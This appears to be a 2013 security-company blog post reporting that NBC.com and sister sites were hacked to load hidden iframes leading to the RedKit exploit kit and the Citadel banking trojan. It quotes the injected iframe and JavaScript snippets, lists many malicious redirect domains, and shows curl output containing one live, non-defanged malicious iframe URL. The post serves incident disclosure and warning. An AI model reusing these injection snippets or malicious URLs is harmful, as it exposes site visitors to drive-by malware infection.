NBC Website HACKED – Be Careful Surfing

Breaking, the NBC site is currently compromised and blacklisted by Google. Anyone that visits the site (which includes any sub page) will have malicious iframes loaded as well redirecting the user to exploit kits (Redkit):

*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Lenos garage and others.

If you are visiting it from Chrome or Firefox would get the following warning:

It seems that the payload is conditional, so a different iframe domain is loaded each time (cycling out various domains). Some of the malicious domains we identified include:

hxxp://walterjeffers.com/
hxxp://nikweinstein.com/
hxxp://umaiskhan.com/
htxp://wordpresspluginsstudio.com/ctuk.html

All their pages had this iframe injected:

<iframe src="httx://nikweinstein.com/cl/google.php" width=1 height=1..

And this is what got added to their javascript files:

document.writeln (" <iframe src="httx://walterjeffers.com/ctuk.html" width=1&nbsp..

Note that these domains are changing, this tells us that something on the server is generating the payload. This isn’t an uncommon practice, it also tells us that the script is likely still on the box. The fact that it’s impacting other sites tells us that the compromise might extend beyond the web application and onto the server. If those other sites are stored on separate boxes then we’re looking at a much bigger, network, compromise, but that is speculative at the moment.

Our research team is analyzing the case (and the malware) and we will post more updates soon. What we can tell is that you should not visit NBC’s site right now. More details on the scan results here: http://sitecheck.sucuri.net/.

The folks at hitmanpro.blog are confirming that it is a drive-by-download attack, specifically using the Citadel Trojan, used for bankin fraud and cyber-espionage. As for the attack vector leading to the compromise, that’s always a challenge to speculate on.

It also appears that the compromise extends to other properties, just found out that the Late Night with Jimmy Fallon is also compromised:

****Update: 13:42 PST | 02/21/2013*****

We did come across this great post by Dancho Danchev in which he better explains things. It looks like this is, was, a complex attack cycling out drive-by-downloads and malicious redirects. He adds the following domains to the growing list of those being cycled for the iframes:

hxxp://priceworldpublishing.com/aynk.html
hxxp://toplineops.com/mtnk.html
hxxp://moi-npovye-sploett.com/qqqq/1.php
hxxp://www.jaylenosgarage.com/trucks/PHP/google.php

He expands things with a list of domains being used for redirection:

hxxp://gonullersultani.net/znzd.htm
hxxp://erabisnis.net/znzd.htm
hxxp://electricianfortwayne.info/62.html
hxxp://moi-npovye-sploett.com/cGeQc0wz1KPI/larktion.php

He goes on to explain the payload being dropped, payload hash. He goes on to break down it’s phone home mechanisms and begins to correlate this attack with others to find some association. Based on his analysis he correlates these attackers with the same group responsive for the Facebook and Verizon spear phishing attempts a few days ago. He goes on to provide a lot more data.

Some are attributing the the payload itself to be generated by the RedKit Exploit Kit, but that is still unconfirmed.

While some folks are reporting it was only infected for 15 minutes we’re not too sure about that, as of right now, emulating a number of agents and crawling various links we are are still able to get it to render:

****Update: 20:33 PST | 02/21/2013*****

So it’s been many hours since the compromise was first identified and we’re still seeing the infection on the NBC website. The same infection as what has been discussed all day but only on a few pages. To make sure that our scanner is not broken I have started testing manually via terminal to verify that it is in fact still infected. I am jumping between various honeypots and checking like this:

# curl -sD - http://www.nbc.com/community/video/season-4-premiere-jim-rash/n31580/ | grep "<iframe"
		_iframeCode = '<iframe id="nbc-video-widget" width="'+_width+'" height="'+_height+'" src="'+playerPath+'?vid=n31580" frameborder="0"></iframe>';
	 var nbcAd728x90='<iframe id="ad728x90" name="ad728x90" src="about:blank" width=728 height=90 noresize scrolling=no hspace=0 vspace=0 frameborder=0 marginheight=0 marginwidth=0>>/iframe>';
<iframe src="http://nikweinstein.com/cl/google.php" width=1 height=1 frameborder="0"></iframegt;

This tells me a couple of things.

First, it’s either caught up in some kind of CDN cache or it’s conditional. I am not able to replicate on every box, it seems as I jump around it comes and goes but SiteCheck continues to catch it. I am starting to think that it’s caught up in cache though, which is still exceptionally dangerous for visitors.

What are others seeing?

Unfortunately more and more large and small organizations are getting hit every day with similar compromises. If you find yourself on the sad end of this stick let us know at info@sucuri.net.